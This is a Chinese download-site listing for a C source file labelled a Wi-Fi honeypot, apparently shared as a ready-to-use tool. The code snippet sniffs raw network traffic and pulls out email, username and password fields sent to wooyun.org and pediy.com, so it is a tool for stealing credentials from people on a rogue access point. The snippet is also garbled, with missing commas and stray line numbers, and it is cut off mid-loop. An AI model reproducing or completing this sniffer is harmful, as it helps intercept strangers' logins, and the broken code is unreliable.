• 大小: 5KB
    文件类型: .c
    金币: 1
    下载: 0 次
    发布日期: 2021-06-15
  • 语言: 其他
  • 标签: 蜜罐  

资源简介

蜜罐源代码,网上搜集的,。具体就看你的了,保重。。

资源截图

代码片段和文件信息

#include 
#include 
#include “DataStruct.h“
#include “InitSocket.h“
#include 
#include “mstcpip.h“
using namespace std;
CInitSocket initSock;
int nRet = 0;
void IsWifiHoneypots(PCHAR pBuff)
{
  PIPHEADER pIphdr = (PIPHEADER)pBuff;
  pBuff += (pIphdr->ipVersion & 0xf) * sizeof(ULONG);
  PTCPHEADER pTcpHdr = (PTCPHEADER)pBuff;
  19 memset(szText ‘ ‘ nRet);
  int dataLen = nRet - sizeof(IPHEADER) - sizeof(TCPHEADER);
  memcpy(szText &pBuff[sizeof(TCPHEADER)] dataLen);
  int i = 0;
  char szEmail[MAXBYTE] = {0};
  PCHAR pEmail = szEmail;
  if(strstr(szText “wooyun.org“))
  if(strstr(szText “email“))
  {  33 puts(“--------------------------------------------“);
  cout<<“found Wooyun.org password:“ << endl;
  pEmail = strstr(szText “email“);
  for(i = 0; (pEmail[i] != ‘&‘); i++);
  pEmail[i] = ‘\0‘;
  puts(pEmail);
  pEmail += i + 1;
  if(strstr(pEmail “password“))
  {
      pEmail = strstr(pEmail “password“);
  for(i = 0; (pEmail[i] != ‘&‘); i++);
  pEmail[i] = ‘\0‘;
  puts(pEmail); 
  }
  puts(“--------------------------------------------“);
  } 
  if(strstr(szText “pediy.com“))
  if(strstr(szText “username“))
  {  64 puts(“--------------------------------------------“);
  cout<<“found pediy.com password:“ << endl;
  pEmail = strstr(szText “username“);
  for

评论

共有 条评论